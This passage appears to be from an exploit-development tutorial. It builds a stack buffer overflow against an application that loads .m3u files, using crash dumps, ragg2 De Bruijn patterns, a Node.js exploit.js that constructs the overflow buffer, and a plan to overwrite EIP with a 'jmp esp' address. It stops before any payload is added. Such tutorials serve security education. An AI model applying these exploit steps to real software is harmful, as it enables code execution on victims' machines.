We are effectively making the application crash and overriding EIP with 0x41414141 (‘AAAA’). We are sure we hit a buffer overflow and now we need to measure the buffer’s length in order to override EIP with whatever value we want. We should try overriding ESP and EIP with known values.

2nd round

We can try using smaller chunks of bytes to improve our precision. Using chunks of 500 bytes long we get ESP pointing to 0x0012EEAC which is filled with 43’s (C’s).

Here we can see ESP points to 0x0012EEAC and the 43’s (C’s) start 4 addressed before ESP.

So, we have to provide 500 ‘A’s, 500 ‘B’s and 16 ‘C’s in order to reach ESP.

3rd round

We change the block size to 1016 bytes to match our calculations and we successfully hit esp as expected.

We placed 1016 ‘A’s, then 1016 ‘B’s starting at ESP, then 1016 ‘C’s.

Now we need to know how big the stack is. We can use a De Bruijn pattern to measure this using radare2’s ragg2 utility

ragg2 -P 2000 -r

4th Round

Our new exploit.js includes a De Bruijn sequence and looks like this:

const blockSize = 1012 let buf = '' buf += 'A'.repeat(blockSize)

buf += 'D'.repeat(4) // overrides EIP const r2pipe = require('r2pipe')

r2pipe.open("/bin/true",function (err, r2) {

if (err) {

console.error(err)

} else {

r2.syscmd(`ragg2 -P ${blockSize} -r`, function(err, o) {

if (err) {

console.error(err)

} else {

buf += o

r2.quit()

process.stdout.write(buf)

}

})

}

})

Let’s try it out!

great! EIP = 0x44444444 == ‘DDDD’

Our ‘A’s chunk starts at 0x12EAb4 and EIP is at 0x12EEA8. Using radare2 we can calculate the difference between the addresses. A third way of knowing the stack length would be providing a Bruijn pattern directly and then getting the offset of EIP’s value after the crash.

ragg2 -P 2000 -r > sample.m3u

# this generates a pattern 2000 bytes long

After loading this sample.m3u EIP’s value is 0x41684641 which is at offset 1012 as we would expect:

Then, we could calculate where the start of the stack was by subtracting this value to EIP’s content address, which is 0x12EAB4 (again, as expected)

In this environment, we can’t place an address from the stack straight into EIP because stack addresses start with 0x00 which is a null character that will prevent the rest of the file to be loaded. We need to jump into the portion of the stack containing our payload using an indirect method. We’ll find an address containing the “jmp esp” instruction and override EIP with it.

Finding the address is easy with Immunity debugger :